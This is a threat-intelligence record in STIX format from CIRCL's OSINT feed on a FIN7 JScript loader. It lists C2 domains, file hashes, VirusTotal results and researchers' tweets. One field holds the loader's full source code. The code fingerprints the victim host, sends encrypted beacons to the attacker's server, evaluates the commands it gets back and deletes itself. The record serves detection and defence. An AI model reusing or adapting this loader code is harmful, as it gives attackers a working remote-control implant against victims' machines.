misp-circl-feed/feeds/circl/stix-2.1/5cda6599-990c-4803-8c89-45e4950d210f.json


{
"type": "bundle",
"id": "bundle--5cda6599-990c-4803-8c89-45e4950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:13.000Z",
"modified": "2019-07-19T09:22:13.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5cda6599-990c-4803-8c89-45e4950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:13.000Z",
"modified": "2019-07-19T09:22:13.000Z",
"name": "OSINT - [Emering] FIN7 JScript Loader Malware",
"published": "2019-07-19T09:22:23Z",
"object_refs": [
"indicator--5cda6ff0-4758-4fe6-a14d-4f4f950d210f",
"x-misp-attribute--5cda7440-6ef4-459c-b3d1-b951950d210f",
"indicator--5cda8135-1174-4cd2-ae6b-456d950d210f",
"x-misp-object--5cda6884-2c74-4a8c-886d-47e3950d210f",
"indicator--5cda6f37-4d7c-4ad4-9000-6ec3950d210f",
"indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"x-misp-object--72369506-7485-494e-b492-2a31c412cf70",
"x-misp-object--5cdaaf7c-422c-4524-856c-464b950d210f",
"x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
"relationship--39b1b60d-5b5b-4e6e-8934-116b94d81656",
"relationship--475f306c-31bd-4ac1-a933-1d53a1499130"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7\"",
"misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7 - G0046\"",
"misp-galaxy:mitre-intrusion-set=\"FIN7\"",
"misp-galaxy:mitre-intrusion-set=\"FIN7 - G0046\"",
"misp-galaxy:threat-actor=\"Anunak\"",
"circl:incident-classification=\"malware\"",
"osint:source-type=\"microblog-post\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda6ff0-4758-4fe6-a14d-4f4f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:36:16.000Z",
"modified": "2019-05-14T07:36:16.000Z",
"description": "C2",
"pattern": "[domain-name:value = 'msdn-update.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T07:36:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cda7440-6ef4-459c-b3d1-b951950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:54:40.000Z",
"modified": "2019-05-14T07:54:40.000Z",
"labels": [
"misp:type=\"other\"",
"misp:category=\"Other\""
],
"x_misp_category": "Other",
"x_misp_comment": "2019-05-13-FIN7-JS-loader.vk.js",
"x_misp_type": "other",
"x_misp_value": "// Bank Statement James Fifeman.xls\r\n// C2: hxxps://msdn-update[.]com/\r\n// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1\r\n\r\nfunction anonymous() {\r\n var zbegbiwhuhro = \"&id=\";\r\n var ihebgysipc = \"fetch\";\r\n var yfusrihyny = \"\";\r\n var tindajrurke = \"get_image\";\r\n var ytysqyprozlibx = \"string\";\r\n var otocywviso = \"no\";\r\n var otbybimollu = \"Unknown\";\r\n var evaritpequx = \"Scripting.FileSystemObject\";\r\n var yqpawymfikorh = \"_\";\r\n var koficijojhi = \"/\";\r\n var inoxhegzajw = \"action=get_command\";\r\n var ihunuxfip = \"request\";\r\n var edomsecejso = \"z\";\r\n var lwilpotasvo = \"create_logo\";\r\n var vimkiwono = \"string\";\r\n var pidwagunit = \"%APPDATA%\";\r\n var gqyxqohoftupi = \"winmgmts:root/CIMV2\";\r\n var erzirolonje = \"create_image\";\r\n var esajigfown = \"decrypt\";\r\n var ewypetevhu = \"?request=page\";\r\n var bgixmabefzaqnu = \"show_ico\";\r\n var huzzakrowopvu = \"\";\r\n var zexygrogy = \"\";\r\n var iwpodhexzubc = \"images\";\r\n var bbymyruztovpi = \"WScript.Shell\";\r\n var xaprislyhbulf = \"show_jpg\";\r\n var inbypzethezag = \"&\";\r\n var ucmomadgib = \"request\";\r\n var vjiwumhojarse = \"group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=\";\r\n var cedlihrijalti = \"?request=content&id=\";\r\n var kyppaltuwti = \"image\";\r\n var ejogamygpu = \"MSXML2.ServerXMLHTTP\";\r\n var cylofalpitx = \"content\";\r\n var fifuwacdez = \"encrypt\";\r\n var atkudecaxme = \"decrypt\";\r\n var obawufdoxsa = \"\";\r\n var bhomnismictu = \"encrypt\";\r\n var ocsekeltan = \"show_png\";\r\n var vivijsozvali = \"User-Agent\";\r\n var yracypcamos = \"no\";\r\n var kexerobi = \"cdn\";\r\n var inamvagtixjyxj = \"POST\";\r\n var usubhejreva = \"_\";\r\n var jaxylibpafl = \"\";\r\n var hbanamyklujt = \"\";\r\n var bvaxoqwetmodg = \"agyjabam=\";\r\n var ditevnaqa = \"https://msdn-update.com/\";\r\n var wegmexxabha = \"POST\";\r\n var dnanehmufride = 
\"encrypt\";\r\n var fypalygos = \"application/x-www-form-urlencoded\";\r\n var urmuqizemz = \"Content-Type\";\r\n\r\n function id() {\r\n var lrequest = wmi.ExecQuery(\"select * from Win32_NetworkAdapterConfiguration where ipenabled = true\");\r\n var lItems = new Enumerator(lrequest);\r\n for (; !lItems.atEnd(); lItems.moveNext()) {\r\n var mac = lItems.item().macaddress;\r\n var dns_hostname = lItems.item().DNSHostName;\r\n if (typeof mac === vimkiwono && mac.length > 1) {\r\n if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {\r\n dns_hostname = otbybimollu;\r\n } else {\r\n for (var i = 0; i < dns_hostname.length; i++) {\r\n if (dns_hostname.charAt(i) > edomsecejso) {\r\n dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);\r\n }\r\n }\r\n }\r\n return mac + yqpawymfikorh + dns_hostname;\r\n }\r\n }\r\n }\r\n\r\n function crypt_controller(type, request) {\r\n var encryption_key = obawufdoxsa;\r\n if (type === esajigfown) {\r\n request = unescape(request);\r\n var request_split = request.split(\")*(\");\r\n request = request_split[0];\r\n encryption_key = request_split[1].split(obawufdoxsa);\r\n } else {\r\n encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);\r\n request = unescape(encodeURIComponent(request));\r\n }\r\n var output = new Array(request.length);\r\n for (var i = 0; i < request.length; i++) {\r\n var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);\r\n output[i] = String.fromCharCode(charCode);\r\n }\r\n var result_string = output.join(obawufdoxsa);\r\n if (type === fifuwacdez) {\r\n result_string = result_string + \")*(\" + encryption_key.join(obawufdoxsa);\r\n result_string = escape(result_string);\r\n }\r\n return result_string;\r\n }\r\n\r\n function get_path() {\r\n var pathes = [iwpodhexzubc, kyppaltuwti, cylofalpitx, ihebgysipc, kexerobi];\r\n var files = [lwilpotasvo, tindajrurke, erzirolonje, bgixmabefzaqnu, 
ocsekeltan, xaprislyhbulf];\r\n var path = pathes[Math.floor(Math.random() * pathes.length)] + koficijojhi + files[Math.floor(Math.random() * files.length)];\r\n return ditevnaqa + path;\r\n }\r\n\r\n function send_data(type, data, crypt) {\r\n try {\r\n var http_object = new ActiveXObject(ejogamygpu);\r\n if (type === ucmomadgib) {\r\n http_object.open(inamvagtixjyxj, get_path() + ewypetevhu, false);\r\n data = bvaxoqwetmodg + crypt_controller(fifuwacdez, vjiwumhojarse + uniq_id + zbegbiwhuhro + id() + inbypzethezag + data);\r\n } else {\r\n http_object.open(inamvagtixjyxj, get_path() + cedlihrijalti + uniq_id, false);\r\n if (crypt) {\r\n data = crypt_controller(fifuwacdez, data);\r\n }\r\n }\r\n http_object.setRequestHeader(vivijsozvali, \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0\");\r\n http_object.setRequestHeader(urmuqizemz, fypalygos);\r\n http_object.setOption(2, 13056);\r\n http_object.send(data);\r\n return http_object.responseText;\r\n } catch (e) {\r\n return otocywviso;\r\n }\r\n }\r\n\r\n function main() {\r\n var ncommand = obawufdoxsa;\r\n ncommand = send_data(ucmomadgib, inoxhegzajw, true);\r\n if (ncommand !== otocywviso) {\r\n try {\r\n eval(crypt_controller(esajigfown, ncommand));\r\n } catch (e) {}\r\n }\r\n var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);\r\n WScript.Sleep(random_knock);\r\n main();\r\n }\r\n var first = false;\r\n var shell = new ActiveXObject(bbymyruztovpi);\r\n var fso = new ActiveXObject(evaritpequx);\r\n var wmi = GetObject(gqyxqohoftupi);\r\n var uniq_id = new Date().getUTCMilliseconds();\r\n var app_path = shell.expandEnvironmentStrings(pidwagunit);\r\n if (fso.GetFolder(app_path).Type.length > 5) {\r\n fso.deleteFile(WScript.ScriptFullName);\r\n try {\r\n WScript.Sleep(120000);\r\n main();\r\n } catch (e) {\r\n main();\r\n }\r\n }\r\n}"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda8135-1174-4cd2-ae6b-456d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T08:49:57.000Z",
"modified": "2019-05-14T08:49:57.000Z",
"description": "C2",
"pattern": "[url:value = 'https://msdn-update.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T08:49:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cda6884-2c74-4a8c-886d-47e3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:04:36.000Z",
"modified": "2019-05-14T07:04:36.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "2019-05-13: [Emering] #FIN7 JScript Loader #Malware\r\n\ud83d\udc32\r\n\r\nsource: 'Bank Statement James Fifeman.xls'\r\ngroup: 'zsoc._1305' [May 13]\r\n\ud83d\uded1\r\nc2: 'msdn-update[.]com'\r\n\ud83d\udd26\r\nMove away from '-cdn' domains \r\n\ud83e\udd14\r\n\r\nh/t @malz_intel\r\n\r\n\ud83d\udee1\ufe0f\r\nPushed to their extracted JS loader GitHub -> \r\n(link: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js) github.com/k-vitali/Malwa\u2026",
"category": "Other",
"uuid": "5cda6884-fafc-4ff5-86eb-46cc950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5cda6884-df40-4d23-bd55-4264950d210f"
},
{
"type": "url",
"object_relation": "url",
"value": "https://twitter.com/VK_Intel/status/1128079463785349121",
"category": "Network activity",
"to_ids": true,
"uuid": "5cda6884-8acc-4b2f-8684-49c8950d210f"
},
{
"type": "text",
"object_relation": "username-quoted",
"value": "@malz_intel",
"category": "Other",
"uuid": "5cda6884-c40c-4d40-b736-4967950d210f"
},
{
"type": "url",
"object_relation": "link",
"value": "https://t.co/BaCFsrePJR?amp=1",
"category": "Network activity",
"to_ids": true,
"uuid": "5cda6884-cefc-440d-97f9-4714950d210f"
},
{
"type": "url",
"object_relation": "link",
"value": "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5cda6884-4d8c-4584-85d0-4a50950d210f"
},
{
"type": "datetime",
"object_relation": "creation-date",
"value": "2019-05-14T01:27:00",
"category": "Other",
"uuid": "5cda6885-34b0-4285-be67-4cb6950d210f"
},
{
"type": "text",
"object_relation": "username",
"value": "VK_Intel",
"category": "Other",
"uuid": "5cda6885-5680-4687-a649-4a84950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda6f37-4d7c-4ad4-9000-6ec3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:40:54.000Z",
"modified": "2019-05-14T07:40:54.000Z",
"pattern": "[file:hashes.SHA256 = '1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1' AND file:name = 'Bank Statement James Fifeman.xls' AND file:x_misp_state = 'Malicious']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T07:40:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:00.000Z",
"modified": "2019-07-19T09:22:00.000Z",
"pattern": "[file:hashes.MD5 = 'b136fed01acf1b7e7e43dfa2db292623' AND file:hashes.SHA1 = 'd8206bc4bc2efc4062b0f173e8841508c95ed0e4' AND file:hashes.SHA256 = '1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-07-19T09:22:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--72369506-7485-494e-b492-2a31c412cf70",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T08:34:49.000Z",
"modified": "2019-05-14T08:34:49.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-14T04:00:38",
"category": "Other",
"uuid": "4ff03189-7f70-4120-9dbf-48339e5c57d0"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1557806438/",
"category": "Payload delivery",
"uuid": "521c12c0-2269-4961-8bad-1482e01ee72b"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "11/60",
"category": "Payload delivery",
"uuid": "c267d1a4-d836-4758-91e2-877f5854faf6"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cdaaf7c-422c-4524-856c-464b950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T12:07:24.000Z",
"modified": "2019-05-14T12:07:24.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "@VK_Intel\r\n Moar #FIN7 (link: https://www.virustotal.com/#/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/detection) virustotal.com/#/file/1fe27e0\u2026\r\nCscript renamed to mswmex57.exe and run from Contacts directory. JavaScript from UserForm1 placed in querlog.txt just like old times. New C2 though: hxxps://msdn-update[.]com/",
"category": "Other",
"uuid": "5cdaaf7d-cca4-49d5-bf6c-4e64950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5cdaaf7d-89bc-4f82-9c5f-4295950d210f"
},
{
"type": "url",
"object_relation": "url",
"value": "https://twitter.com/malz_intel/status/1128058016471719936",
"category": "Network activity",
"to_ids": true,
"uuid": "5cdaaf7d-5bc8-4555-bfdf-4dc4950d210f"
},
{
"type": "text",
"object_relation": "username-quoted",
"value": "@VK_Intel",
"category": "Other",
"uuid": "5cdaaf7d-d750-4d9d-a9a6-4b4b950d210f"
},
{
"type": "datetime",
"object_relation": "creation-date",
"value": "2019-05-14T00:02:00",
"category": "Other",
"uuid": "5cdaaf7d-9734-4341-ae0f-4d72950d210f"
},
{
"type": "text",
"object_relation": "username",
"value": "malz_intel",
"category": "Other",
"uuid": "5cdaaf7d-bb48-4f3f-80bb-48a2950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:01.000Z",
"modified": "2019-07-19T09:22:01.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-06-12T04:39:43",
"category": "Other",
"uuid": "c1bf4318-12d5-451a-a094-3ecf4f476b2a"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1560314383/",
"category": "Payload delivery",
"uuid": "4b41b608-5721-4f9a-8950-7775eefaebce"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "30/59",
"category": "Payload delivery",
"uuid": "de92bfbb-35cc-4731-8327-4be37aa1cbee"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--39b1b60d-5b5b-4e6e-8934-116b94d81656",
"created": "2019-05-14T08:34:49.000Z",
"modified": "2019-05-14T08:34:49.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"target_ref": "x-misp-object--72369506-7485-494e-b492-2a31c412cf70"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--475f306c-31bd-4ac1-a933-1d53a1499130",
"created": "2019-07-19T09:22:01.000Z",
"modified": "2019-07-19T09:22:01.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"target_ref": "x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}